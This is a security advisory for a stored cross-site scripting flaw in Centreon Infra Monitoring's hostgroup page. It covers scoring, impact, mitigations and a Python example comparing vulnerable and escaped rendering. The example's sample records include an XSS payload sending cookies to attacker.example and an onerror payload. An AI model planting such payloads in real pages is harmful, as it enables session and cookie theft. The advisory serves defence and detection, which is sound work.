CVE-2025-54890: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Centreon Infra Monitoring
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hostgroup configuration page) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19, from 23.10.0 before 23.10.29.
AI Analysis
Technical Summary
CVE-2025-54890 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in the Hostgroup configuration page of Centreon Infra Monitoring. Input supplied on that page is not neutralized before it is written back into generated HTML, so a user who holds the privilege to edit hostgroup configuration can store a script payload that later executes in the browser of any other user who opens the affected page. Affected versions are 23.10.0 before 23.10.29, 24.04.0 before 24.04.19, and 24.10.0 before 24.10.15.

Injecting the payload requires elevated privileges (PR:H), typically an administrator or a user with configuration rights. Once the payload is stored, no further action by the attacker is needed and the victim does nothing beyond viewing the page in normal use, which the score treats as no user interaction (UI:N). The CVSS v3.1 base score of 6.8 (medium) combines a network attack vector (AV:N), low attack complexity (AC:L), high privileges required (PR:H), no user interaction (UI:N), changed scope (S:C), high confidentiality impact (C:H) and no integrity or availability impact (I:N, A:N); these metrics do compute to 6.8. Scope is changed because the injected script runs in the victim's browser, outside the component that accepted the input. High confidentiality impact means the attacker can read whatever the victim's browser can read on that origin: session cookies that are not marked HttpOnly, tokens, page content and responses to requests made with the victim's session. The vector rates integrity and availability impact as none, so the scored impact is information disclosure rather than data modification or service disruption. Defenders should still remember that script executing in an administrator's session can drive the application as that administrator, so I:N is a scoring convention for XSS, not a guarantee that configuration cannot be changed through this flaw.

No public exploit has been reported. The vulnerability matters most where several administrators or configuration users share one Centreon instance, since a single malicious or compromised privileged account can reach all the others. Centreon Infra Monitoring is widely deployed for enterprise IT infrastructure monitoring, so organizations that depend on it for operational visibility and alerting should treat this issue as relevant.
Potential Impact
For European organizations, the realistic consequence is disclosure of whatever another privileged user's browser can access in Centreon: session identifiers, tokens, and the monitoring and configuration data visible on the page. A stolen administrator session can then be used for unauthorized access, effective privilege escalation to that administrator's rights, and lateral movement, because a monitoring platform has visibility into much of the estate it watches. Centreon Infra Monitoring is often deployed in critical infrastructure and large enterprise environments, so loss of confidentiality here can also undermine operational security and incident response. The need for elevated privileges narrows the attack surface, but an insider with configuration rights, or a single compromised privileged account, is enough to exploit it. The vulnerability does not directly affect integrity or availability, so service disruption is unlikely, yet the security implications remain significant. Organizations subject to data-protection regulation such as the GDPR should weigh the confidentiality risk and remediate promptly to avoid compliance exposure.
Mitigation Recommendations
The primary mitigation is to upgrade Centreon Infra Monitoring to a fixed release: 23.10.29, 24.04.19 or 24.10.15, or any later release in the same branch. Until the patch is applied, the following measures reduce exposure:
- Restrict the right to edit hostgroup configuration to the smallest set of trusted administrators and audit that set regularly. The attacker must already hold this privilege, so every unnecessary grant is attack surface.
- Review existing hostgroup definitions for unexpected HTML or script markup. A payload may already have been stored before patching; finding one is evidence of exploitation, and the account that wrote it should be investigated.
- If custom pages, dashboards or integrations render Centreon configuration data (hostgroup names, aliases, comments), make sure they HTML-encode those values on output, because the same stored values reach them.
- Deploy a Content Security Policy that disallows inline script and restricts script sources, to limit what an injected payload can do. Test it against the Centreon UI before enforcing it, since legacy pages often rely on inline script; a report-only policy is a safe first step.
- Confirm that the session cookie is set with the HttpOnly and Secure flags so a script cannot read it directly. Note that HttpOnly does not stop a script from acting within the victim's session.
- Monitor application and web server logs for edits to hostgroup configuration, particularly by unexpected accounts or at unusual times, and brief administrators on the risk of pasting untrusted content into configuration fields.
- Use web application firewall rules targeting XSS payloads as an interim measure only; such rules are routinely bypassed and do not replace the patch.
- Keep an incident response plan ready so that suspected exploitation (a found payload, an unexplained administrator session) can be handled quickly, including session invalidation and credential rotation for affected users.
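The rendering defect described in the Technical Summary, and the output-encoding and stored-definition audit recommended under Mitigation Recommendations, as an added example in Python. This is illustration code, not Centreon's implementation: the record layout, field names and sample values are constructed for the example, and the advisory does not state which hostgroup field is affected.

```python
"""Added example (not Centreon code): vulnerable vs. hardened rendering of a
stored hostgroup record, plus an audit that flags stored values containing
HTML markup or inline event handlers.

Assumptions: records are dicts with 'id', 'name' and 'alias' keys; this is a
made-up layout, not Centreon's schema.
"""
import html
from html.parser import HTMLParser

# Constructed sample records (not real Centreon data). Record 2 and 3 carry
# injected markup; record 4 contains a bare '<' that must NOT be flagged.
HOSTGROUPS = [
    {"id": 1, "name": "web-frontends", "alias": "Public web tier"},
    {"id": 2,
     "name": "db-<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
     "alias": "Databases"},
    {"id": 3, "name": "edge", "alias": "<img src=x onerror=alert(1)>"},
    {"id": 4, "name": "batch", "alias": "alert when load < 5"},
]


def render_row_vulnerable(hg):
    """Interpolates stored values straight into HTML: the CWE-79 pattern."""
    return f"<tr><td>{hg['id']}</td><td>{hg['name']}</td><td>{hg['alias']}</td></tr>"


def render_row_hardened(hg):
    """Same row with every stored value entity-encoded for an HTML element context.

    html.escape() encodes &, <, >, " and ', which neutralizes both the
    <script> payload and the attribute-breaking onerror payload above.
    """
    return (
        f"<tr><td>{html.escape(str(hg['id']))}</td>"
        f"<td>{html.escape(hg['name'])}</td>"
        f"<td>{html.escape(hg['alias'])}</td></tr>"
    )


class _MarkupFinder(HTMLParser):
    """Collects start tags and on* handler attributes seen in a stored value.

    A real parser is used instead of a regex so that a harmless '<' followed
    by whitespace (record 4) is treated as text, as a browser would.
    """

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self.findings.append(f"tag:{tag}")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"handler:{name.lower()}")


def find_markup(value):
    """Returns a list like ['tag:img', 'handler:onerror'] for one stored value."""
    parser = _MarkupFinder()
    parser.feed(value)
    parser.close()
    return parser.findings


def audit(hostgroups, fields=("name", "alias")):
    """Returns {record id: [field:finding, ...]} for records containing markup."""
    hits = {}
    for hg in hostgroups:
        findings = []
        for field in fields:
            findings += [f"{field}:{f}" for f in find_markup(hg[field])]
        if findings:
            hits[hg["id"]] = findings
    return hits


if __name__ == "__main__":
    for hg in HOSTGROUPS:
        print(render_row_hardened(hg))
    print(audit(HOSTGROUPS))
```

The audit is a detection aid for definitions stored before patching; it reports where markup sits and in which field, so the account that wrote it can be traced, but it does not replace upgrading. The hardened renderer is correct only for values placed in element content; a value placed inside an attribute, a URL or a script block needs the encoding for that context.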
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy
Technical Details
- Data Version: 5.2
- Assigner Short Name: Centreon
- Date Reserved: 2025-07-31T18:22:28.420Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 694929690a7f5b66fcebbfcd
Added to database: 12/22/2025, 11:20:09 AM
Last enriched: 12/22/2025, 11:20:46 AM
Last updated: 12/22/2025, 2:13:11 PM